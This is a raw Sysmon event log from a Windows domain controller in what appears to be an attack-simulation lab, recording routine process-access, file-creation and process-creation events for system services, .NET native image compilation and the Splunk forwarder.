13:26:16.183{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4678-6000-5504-000000009A01}3724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008440Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.167{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4678-6000-5504-000000009A01}3724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008439Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:16.167{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4678-6000-5504-000000009A01}3724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008438Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:16.042{08A6967A-4676-6000-5204-000000009A01}4152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1038-0\System.Data.Linq.dll2021-01-14 13:26:16.042 10341000x80000000000000008493Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.902{08A6967A-4679-6000-5A04-000000009A01}28323148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008492Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.761{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4679-6000-5A04-000000009A01}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008491Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.761{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008490Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.761{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008489Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.761{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008488Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.761{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008487Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.761{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008486Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.761{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008485Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.761{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008484Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.761{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008483Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.761{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008482Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.761{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4679-6000-5A04-000000009A01}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008481Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.761{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4679-6000-5A04-000000009A01}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008480Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.621{08A6967A-4679-6000-5A04-000000009A01}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008479Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.293{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4679-6000-5904-000000009A01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008478Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.261{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4679-6000-5904-000000009A01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008477Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.261{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4679-6000-5904-000000009A01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008476Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.058{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4678-6000-5804-000000009A01}4740C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008475Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.058{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008474Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.058{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008473Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.058{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008472Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.058{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008471Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:17.058{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008470Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 